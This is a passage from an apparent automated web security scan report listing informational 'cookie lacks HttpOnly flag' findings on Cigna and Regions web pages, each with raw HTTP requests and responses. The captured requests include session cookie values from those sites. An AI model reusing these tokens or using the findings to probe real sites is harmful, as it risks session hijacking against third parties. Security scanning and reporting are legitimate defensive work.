Path:   /ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; JSESSIONID_CHCP=0001na8X0IINOPnLxTXec-srnIs:84FF2VLHC; PD_STATEFUL_dd717822-289d-11e0-8e97-2054895daa77=%2Fwps; JSESSIONID=0000PZ1yjRG2WKh36hwOt68f6X_:15eoj2var; PD_STATEFUL_db12e020-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6; PD_STATEFUL_fab19a1c-356c-11e0-b99e-2054895daa77=%2Fportal

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 318
content-type: text/plain
date: Mon, 16 May 2011 15:31:58 GMT
last-modified: Mon, 20 Dec 2010 18:20:32 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_32910a44-289d-11e0-8e97-2054895daa77=%2FProviderTheme; Path=/

..............(.......(....... ................................................................................................................    .......................    ......    ...............    .........
...[SNIP]...

8.18. https://cignaforhcp.cigna.com/portal/images/arrowonly_gold.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cignaforhcp.cigna.com
Path:   /portal/images/arrowonly_gold.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/images/arrowonly_gold.gif HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/wps/portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=92964B127FD1107FCAD3A536181C0CE6; JSESSIONID=0000m0b58O_Mt6JKcD_nHJ5-y0C:15eoj2vv7; PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; JSESSIONID_CHCP=0001na8X0IINOPnLxTXec-srnIs:84FF2VLHC; PD_STATEFUL_dd717822-289d-11e0-8e97-2054895daa77=%2Fwps

Response

HTTP/1.1 200 OK
accept-ranges: bytes
content-length: 63
content-type: image/gif
date: Mon, 16 May 2011 15:35:50 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_fab19a1c-356c-11e0-b99e-2054895daa77=%2Fportal; Path=/

GIF89a.............!.......,................|..@.fm.s..a...f..;

8.19. https://my.cigna.com/mycignatheme/js/min/jsTop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/js/min/jsTop.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/js/min/jsTop.js HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: application/x-javascript
date: Mon, 16 May 2011 15:30:36 GMT
last-modified: Wed, 20 Apr 2011 17:47:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/
Content-Length: 168592

function progressbar(limit, met, gwidth) {    
calpercentage = Math.round(met*100/limit);
calwidth=Math.round(gwidth*(calpercentage/100));
remwidth=Math.round(gwidth-calwidth)
output='<div class="out
...[SNIP]...

8.20. https://my.cigna.com/mycignatheme/js/min/jsTop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/js/min/jsTop.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/js/min/jsTop.js HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=68E806DE7FD1107F11DEAFC5F6A8CE37; TLTUID=68E806DE7FD1107F11DEAFC5F6A8CE37; MYCIGNA_OEP_JSESSIONID=0000gya5ooLNN8su43COFm2xuVB:15ngp3vj1; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: application/x-javascript
date: Mon, 16 May 2011 15:30:26 GMT
last-modified: Wed, 20 Apr 2011 17:47:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/
Content-Length: 168592

function progressbar(limit, met, gwidth) {    
calpercentage = Math.round(met*100/limit);
calwidth=Math.round(gwidth*(calpercentage/100));
remwidth=Math.round(gwidth-calwidth)
output='<div class="out
...[SNIP]...

8.21. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/forgotpassword
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 139
content-type: text/plain
date: Mon, 16 May 2011 15:31:15 GMT
last-modified: Fri, 22 Apr 2011 16:46:54 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....PLTE........3.....tRNS....0J...IDATx.b`d..0.......-.....IEND.B`.

8.22. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; TLTHID=76A27AB67FD1107FC7F0A536181C0CE6

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 139
content-type: text/plain
date: Mon, 16 May 2011 15:31:16 GMT
last-modified: Fri, 22 Apr 2011 16:46:54 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_d992271a-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....PLTE........3.....tRNS....0J...IDATx.b`d..0.......-.....IEND.B`.

8.23. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/forgotid
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 139
content-type: text/plain
date: Mon, 16 May 2011 15:31:05 GMT
last-modified: Fri, 22 Apr 2011 16:46:54 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....PLTE........3.....tRNS....0J...IDATx.b`d..0.......-.....IEND.B`.

8.24. https://my.cigna.com/web/public/guest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /web/public/guest

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /web/public/guest HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: http://www.mycigna.com/
Cache-Control: max-age=0
Origin: http://www.mycigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758
Content-Length: 0

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:21 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 22481
ibm-web2-location: /web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: private, max-age=60
expires: Mon, 16 May 2011 15:31:21 GMT
Set-Cookie: TLTSID=698A01C87FD1107F1A7A812241DDEA34; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=698A01C87FD1107F1A7A812241DDEA34; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:21 GMT
Set-Cookie: PD_STATEFUL_ccb88d86-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 22491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...

8.25. https://my.cigna.com/web/public/guest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /web/public/guest

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web/public/guest HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/
Cache-Control: max-age=0
Origin: https://my.cigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C
Content-Length: 0

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:33 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 22481
ibm-web2-location: /web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: private, max-age=60
expires: Mon, 16 May 2011 15:31:33 GMT
Set-Cookie: PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 22491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...

8.26. http://regions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://regions.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 302 Redirect
Set-Cookie: WWW.REGIONS.COM-HTTP=R2564757028; path=/
Content-Length: 146
Content-Type: text/html
Location: https://www.regions.com
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:41:51 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://www.regions.com">here</a></body>

8.27. https://secure.regionsmortgage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.regionsmortgage.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: secure.regionsmortgage.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
ntCoent-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:30:26 GMT
Set-Cookie: NSC_tfdvsf.npsuhbhf-wjq=ffffffffaf130e8145525d5f4f58455e445a4a423660;expires=Mon, 16-May-2011 15:47:24 GMT;path=/
Set-Cookie: rfaft2c1=3drGKRGPiL8l+bTjFqkS/7Avg5cA1; Domain=.regionsmortgage.com; Path=/; HttpOnly
Set-Cookie: rfaft2c1_.regionsmortgage.com_%2F_wlf=TlNDX3RmZHZzZi5ucHN1aGJoZi13anFf?xSHrpgIYavehm1DAGTFWnGGtSQcA&; Domain=.regionsmortgage.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
X-Expires-Orig: None
Cache-Control: max-age=3, must-revalidate, private
Cache-Control: private
Set-Cookie: NSC_tfdvsf.sfhjpotnpsuhbhf.dpn=ffffffffaf130d0445525d5f4f58455e445a4a423660;path=/;secure
Content-Length: 1635

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

8.28. https://secureapps.regions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: secureapps.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: secureapps.regions.com-ssl=R54983192; WT_FPC=id=2125ecebef9cc3240da1305556579133:lv=1305556579133:ss=1305556579133

Response

HTTP/1.1 403 Forbidden
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:41:40 GMT

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...

8.29. https://secureapps.regions.com/OAO/DESGetFiles.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /OAO/DESGetFiles.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OAO/DESGetFiles.aspx?type=styles&version=63438902696&files=13 HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Date: Mon, 16 May 2011 15:19:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Thu, 16 Jun 2011 05:00:00 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 804

.VAMErrorText
{
}

.VAMBlinkText
{
color: White;
}

.VAMFieldWithError
{
}

.VAMValSummary
{
color: red;
}

.VAMValSummary:link {color: red; text-decoration: none;}
.VAMValSum
...[SNIP]...

8.30. https://secureapps.regions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=maulyk45yit1a2rvnyvjro3i; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 404 Not Found
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:46 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

8.31. https://secureapps.regions.com/oao/DES/Appearance/Validation/Validation.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/DES/Appearance/Validation/Validation.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/DES/Appearance/Validation/Validation.css HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45

Response

HTTP/1.1 403 Forbidden
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 1529
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:02 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be displayed</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html;
...[SNIP]...

8.32. https://secureapps.regions.com/oao/ErrorPage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/ErrorPage.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/ErrorPage.aspx HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreensavings
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; ASP.NET_SessionId=wm55et55z1a3uoz33gj0wayn; secureapps.regions.com-ssl=R54983192

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:21:02 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 9876


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...

8.33. https://secureapps.regions.com/oao/FormHandler.js  previous  next

Summary

